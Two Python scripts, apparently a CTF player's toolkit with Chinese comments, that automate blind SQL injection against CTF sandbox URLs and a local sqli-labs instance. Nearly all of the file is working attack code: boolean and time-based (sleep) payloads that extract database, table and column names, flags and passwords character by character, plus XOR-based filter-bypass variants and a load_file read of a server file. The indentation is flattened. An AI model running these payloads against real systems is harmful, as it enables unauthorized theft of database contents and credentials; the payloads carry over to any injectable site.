import requests
#url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
#url = "http://localhost/sqli-labs-master/Less-1/?id=1'"
url = "http://challenge-8001a3f6b43953f3.sandbox.ctfhub.com:10080/"
result = ''
# 估计有10个,limit 1-10, group_concat会重复
for code in range(0, 10):
result += " --- next limit data : "
for x in range(1, 50):
#for x in range(70, 100):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
#load_file外带
#payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
#数据库名
#payload = "and ascii(substr((select database()),%d,1))>%d--+" % (x, mid)
#表名
#payload = "and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d --+" % (code,x, mid)
#列名
#payload = "and ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d,1),%d,1))>%d --+" % (code,x, mid)
#根据情况修改,and 被过滤
payload = "?id=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)
payload = "?id=if(ascii(substr((select column_name from information_schema.columns where table_name='flag' limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)
payload = "?id=if(ascii(substr((select flag from flag limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)
# and,空格,if被过滤(必须两个异或,不懂?)
#payload = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(x,mid)
#数据库名字
#payload = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),%d,1))>%d)^1"%(x, mid)
# 表名
#payload = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(x,mid)
#表名
#payload = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(x,mid)
#列名
payload = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1"%(x, mid)
#print(payload)
response = requests.get(url + payload)
if 'query_success' in response.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
print(mid)
result += chr(mid)
if (mid == 32):
print(result)
break;
print("[*] the name are {0}".format(result))
#其他函数
#ascii可用ord替换,substr用mid
#?id=-1' or ascii(substr((select database() limit 0,1),1,1))>111--+
#?id=-1'%20or%20left(database(),2)='se'%20--+
#正则
#?id=-1'or%20(database()%20regexp%20'^sec')=1--+
#select user like 'ro%'
#IF(expr1,expr2,expr3)
#if(ascii(substr(database(),1,1))>115,0,sleep(5))--+
import requests
import time
url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
url = "http://localhost/sqli-labs-master/Less-1/?id=1'"
url = "http://challenge-4209e5f8252d6563.sandbox.ctfhub.com:10080/"
result = ''
for code in range(0,10):
for x in range(7, 50):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
#load_file外带
#payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
#数据库名
#payload = "?id=1 and if(ascii(substr(database(),%d,1))>%d,1,sleep(5))--+" % (x, mid)
#表名
payload = "?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
#列名
#payload = "and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
#字段
payload = "?id=1 and if(ascii(substr((select flag from flag limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
#print(payload)
#payload = "?id=1 and if(1=1,1,sleep(10))--+"
ss = time.time()
response = requests.get(url + payload)
if time.time() - ss < 4:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
print(mid)
result += chr(mid)
if (mid == 32):
print(result)
break;
print("[*] the name are {0}".format(result))
#其他函数
#ascii可用ord替换,substr用mid
#?id=-1' or ascii(substr((select database() limit 0,1),1,1))>111--+
#?id=-1'%20or%20left(database(),2)='se'%20--+
#正则
#?id=-1'or%20(database()%20regexp%20'^sec')=1--+
#select user like 'ro%'